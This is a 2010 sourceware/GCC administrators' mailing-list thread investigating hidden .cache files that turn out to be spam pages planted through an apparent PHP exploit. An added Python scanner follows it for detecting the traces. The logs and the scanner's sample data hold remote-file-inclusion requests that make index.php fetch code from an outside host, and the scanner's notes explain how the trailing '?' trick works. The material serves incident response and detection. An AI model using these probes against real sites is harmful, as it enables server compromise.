* htdig/.cache directory
@ 2010-03-03 1:23 Joseph S. Myers
2010-03-03 2:47 ` Joseph S. Myers
0 siblings, 1 reply; 4+ messages in thread
From: Joseph S. Myers @ 2010-03-03 1:23 UTC (permalink / raw)
To: overseers
The latest gccadmin update_web_docs_svn cron job resulted in a large
number of errors of the form:
rm: cannot remove `./htdig/.cache/.%2E8F%0A8A%ECC8%9BC5%EF7A%2C8B': Permission denied
http://gcc.gnu.org/ml/gccadmin/2010-q1/msg00150.html
Has something changed just now to create this directory
(/www/gcc/htdocs/htdig/.cache), or to make it non-writable to gccadmin?
If this directory is indeed meant to be there, then the relevant script
(wwwdocs/bin/preprocess) probably needs to be taught to ignore it rather
than trying to remove files from it.
--
Joseph S. Myers
joseph@codesourcery.com
* Re: htdig/.cache directory
2010-03-03 1:23 htdig/.cache directory Joseph S. Myers
@ 2010-03-03 2:47 ` Joseph S. Myers
2010-03-03 2:53 ` Frank Ch. Eigler
2010-03-03 3:24 ` probable php exploit, was " Frank Ch. Eigler
0 siblings, 2 replies; 4+ messages in thread
From: Joseph S. Myers @ 2010-03-03 2:47 UTC (permalink / raw)
To: overseers
In IRC discussion, we (fche and I) concluded that the files should not be
there, and the problem was that something (unidentified) had created them;
there are more such .cache directories elsewhere on the system, that also
should not be there, some created on Feb 26. We haven't worked out what
created the files.
--
Joseph S. Myers
joseph@codesourcery.com
* Re: htdig/.cache directory
2010-03-03 2:47 ` Joseph S. Myers
@ 2010-03-03 2:53 ` Frank Ch. Eigler
2010-03-03 3:24 ` probable php exploit, was " Frank Ch. Eigler
1 sibling, 0 replies; 4+ messages in thread
From: Frank Ch. Eigler @ 2010-03-03 2:53 UTC (permalink / raw)
To: Joseph S. Myers; +Cc: overseers
Hi -
> [...] We haven't worked out what created the files.
Eww, base-64-decoded some random one of the /.cache/.%DEADBEEF files:
<!--/shop/item/325/-->
<html>
<head>
<title>download windows 7 via ftp CLICK HERE! DOWNLOAD Microsoft Windows 7 Ultimate (64 bit)! NEW SOFTWARE!</title>
<meta name="description" content="Download Windows 7 Via Ftp. The same situation exists with MP3 arguably the most popular format for audio (notably audio you rip from your CD collection). ">
<meta name="keywords" content="download windows 7 via ftp,download windows 7 via ftp,download windows 7 via ftp">
<meta name="author" content="Jason Molenda, International Man Of Mystery">
</head>
<body bgcolor="white" text="black" link="#0000EE" VLINK="#551A8B" ALINK="red">
<table align="left" border="1" cellspacing="0" cellpadding="8" width="20%">
<td bgcolor="#eeeeee" valign="top">
<table bgcolor="#eeeeee" border="0" cellspacing="0" cellpadding="3" width="100%">
<tr><td colspan="2"><p></td></tr>
<tr><td colspan="2"><a href="/gcc/ml/gcc/2009-10/?best_software/6074/download/cheap-cs4.html" title="cheap cs4">Cheap Cs4</a></td></tr>
<tr><td colspan="2"><a href="/gcc/ml/gcc/2009-10/?best_software/1213/download/buy-after-effects.html" title="buy after effects">Buy After Effects</a></td></tr>
<tr><td colspan="2"><a href="/gcc/ml/gcc/2009-10/?best_software/4092/download/buy-frontpage.html" title="buy frontpage">Buy Frontpage</a></td></tr>
<tr><td colspan="2"><a href="/gcc/ml/gcc/2009-10/?best_software/3282/download/xp-for-sale.html" title="xp for sale">Xp For Sale</a></td></tr>
....
* probable php exploit, was Re: htdig/.cache directory
2010-03-03 2:47 ` Joseph S. Myers
2010-03-03 2:53 ` Frank Ch. Eigler
@ 2010-03-03 3:24 ` Frank Ch. Eigler
1 sibling, 0 replies; 4+ messages in thread
From: Frank Ch. Eigler @ 2010-03-03 3:24 UTC (permalink / raw)
To: Joseph S. Myers; +Cc: overseers
Hi -
It gets better. So someone placed /index.php files here and there,
using the .cache files as spam payload. I saved a bunch of this in
/root/dot-cache-spam-artifacts/.
There are suspicious entries such as this in the logs:
% fgrep .cache /var/log/httpd/gcc*_log | less
/var/log/httpd/gcc-error_log:[client 66.249.71.244] PHP Notice: Undefined index: HTTP_A in /export/u0/sourceware/sourceware/www/gcc/htdocs/htdig/.cache/.%D59C%49AA%73A8%63A1%9159%0441 on line 1
/var/log/httpd/gcc-error_log:[client 66.249.71.244] PHP Notice: Undefined index: HTTP_A in /export/u0/sourceware/sourceware/www/gcc/htdocs/htdig/.cache/.%D59C%49AA%73A8%63A1%9159%0441 on line 1
/var/log/httpd/gcc-error_log:[client 66.249.71.244] PHP Notice: Undefined index: HTTP_A in /export/u0/sourceware/sourceware/www/gcc/htdocs/htdig/.cache/.%D59C%49AA%73A8%63A1%9159%0441 on line 1
/var/log/httpd/gcc-error_log:[client 66.249.71.244] PHP Notice: Undefined index: HTTP_A in /export/u0/sourceware/sourceware/www/gcc/htdocs/htdig/.cache/.%D59C%49AA%73A8%63A1%9159%0441 on line 1
/var/log/httpd/gcc-error_log:[client 66.249.71.244] PHP Notice: Undefined index: HTTP_A in /export/u0/sourceware/sourceware/www/gcc/
Searching for that IP address:
/var/log/httpd/cygwin-combined_log:66.249.71.244 - - [01/Mar/2010:12:28:18 +0000] "GET /cgi%20%5B...%5D%3C/b%3E%3C/td%3E%3C/span%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cspan%20class='wynikfirmy1'%20style='font:%20normal%2010px%20verdana;'%3E%20%20%20%20%20%20%20%202008-10-10%20::%20%3Ca%20class='wynikfirmy1'%20href='?oid=451&odp=1387'%3Emammamia;%20%3Ca%20href= HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" (67%)
But according to ARIN it's a real google address.
More suspicious stuff:
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET /ml//index.php?include=http://pangestu.700megs.com/columbus/heheh.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0" (-%)
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET //index.php?include=http://pangestu.700megs.com/columbus/heheh.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0" (-%)
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET /ml/fortran/2005-11//index.php?include=http://pangestu.700megs.com/columbus/heheh.txt? HTTP/1.1" 404 305 "-" "Mozilla/5.0" (-%)
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET /ml/fortran//index.php?include=http://pangestu.700megs.com/columbus/heheh.txt? HTTP/1.1" 404 297 "-" "Mozilla/5.0" (-%)
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET /ml/fortran/2005-11/msg00424.html//index.php?include=http://pangestu.700megs.com/columbus/heheh.txt? HTTP/1.1" 404 319 "-" "Mozilla/5.0" (-%)
I up2dated php and other stuff on sourceware; maybe it was a
vulnerability there being exploited. Previous version was 4.3.9-3.26.
See also http://rhn.redhat.com/errata/RHSA-2010-0040.html
See also http://www.google.com/search?q=php%20Undefined%20index%20HTTP_A
for another few victims.
- FChE
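The two log patterns in the message above are worth being able to pick out mechanically: a request such as `index.php?include=http://.../heheh.txt?` is a remote-file-inclusion probe against any script that hands a request parameter to include(), and a "PHP Notice ... in .../htdig/.cache/.%D59C... on line 1" shows that PHP was executing the dotfile, so the .cache entries are code rather than cached pages. The scanner below is an added example, not code from the thread or from the sourceware.org setup. Its sample log lines are constructed: the first two access-log entries and the first error-log entry are modelled on the ones quoted above, while 192.0.2.10 and 198.51.100.7 and their requests are invented. The reading of "Undefined index: HTTP_A" as a lookup of a request header named A is an assumption; the thread does not show the payload's source.

```python
"""Added example, not code from the thread or from sourceware.org: a scanner
for the two indicators described in the message above, run over constructed
sample log lines modelled on the ones posted."""
import re
from urllib.parse import parse_qsl

# Constructed sample access-log lines (Apache combined format). The first two
# are modelled on the 218.38.136.125 entries in the thread; the other two are
# invented: one benign request and one php:// stream-wrapper probe.
ACCESS_LOG = """\
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET /ml//index.php?include=http://pangestu.700megs.com/columbus/heheh.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET //index.php?include=http://pangestu.700megs.com/columbus/heheh.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
192.0.2.10 - - [27/Feb/2010:07:21:03 +0000] "GET /ml/gcc/2009-10/msg00001.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.7 - - [27/Feb/2010:07:22:10 +0000] "GET /index.php?page=php://input HTTP/1.1" 200 120 "-" "Mozilla/5.0"
"""

# Constructed sample error-log lines; the first is modelled on the PHP notice
# quoted in the thread, the second is ordinary noise.
ERROR_LOG = """\
[client 66.249.71.244] PHP Notice: Undefined index: HTTP_A in /export/u0/sourceware/sourceware/www/gcc/htdocs/htdig/.cache/.%D59C%49AA%73A8%63A1%9159%0441 on line 1
[client 192.0.2.10] File does not exist: /export/u0/sourceware/sourceware/www/gcc/htdocs/favicon.ico
"""

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
PHP_ERR_RE = re.compile(
    r'^\[client (?P<ip>\S+)\] PHP (?P<level>\w+): (?P<msg>.*?) '
    r'in (?P<file>\S+) on line (?P<line>\d+)'
)
# A parameter value that is itself a URL or a PHP stream wrapper is what a
# remote-file-inclusion probe against include($_GET[...]) looks like.
REMOTE_VALUE_RE = re.compile(r'^(?:https?|ftp|php|data|expect|phar)://', re.I)


def rfi_params(target):
    """Return (name, value) pairs in the query string whose value looks remote.
    The target is split by hand rather than with urlsplit, because a request
    line such as '//index.php?...' would otherwise be parsed as a netloc."""
    _path, _sep, query = target.partition("?")
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_VALUE_RE.match(v)]


def scan_access_log(text):
    """Flag requests carrying a URL or stream wrapper in a query parameter.
    The trailing '?' on the attacker's URL is deliberate: anything the
    vulnerable script appends (such as '.php') becomes a query string on
    the attacker's server instead of breaking the fetch."""
    findings = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        path = m.group("target").partition("?")[0]
        for name, value in rfi_params(m.group("target")):
            findings.append({"ip": m.group("ip"), "path": path, "param": name,
                             "value": value, "status": int(m.group("status"))})
    return findings


def _hidden_component(path):
    # True when any path component is a dotfile or dot-directory.
    return any(p.startswith(".") and p not in (".", "..") for p in path.split("/"))


def scan_error_log(text):
    """Flag PHP diagnostics raised from a file inside a dot-directory or a
    dotfile: PHP was executing that file, so it is code, not cache data.
    'Undefined index: HTTP_A' means the script read a key named HTTP_A,
    most likely $_SERVER['HTTP_A'], i.e. a request header 'A' (an assumption
    about the payload, since the thread does not show its source)."""
    findings = []
    for line in text.splitlines():
        m = PHP_ERR_RE.match(line)
        if m and _hidden_component(m.group("file")):
            findings.append({"ip": m.group("ip"), "file": m.group("file"),
                             "msg": m.group("msg"), "line": int(m.group("line"))})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(ACCESS_LOG):
        print(f"RFI probe from {f['ip']}: {f['path']} ?{f['param']}={f['value']} -> {f['status']}")
    for f in scan_error_log(ERROR_LOG):
        print(f"PHP executed hidden file {f['file']} (client {f['ip']}): {f['msg']}")
```

On real logs the access-log check produces a list of (client, path, parameter) triples to compare against the modification times of any index.php found under the document root, and the error-log check lists every hidden file PHP has actually executed, which is a tighter starting set than `find -name .cache`. A 404 on the probe, as in the quoted entries, only says that particular path had no index.php; it does not say the site is clean, which is why both checks are needed.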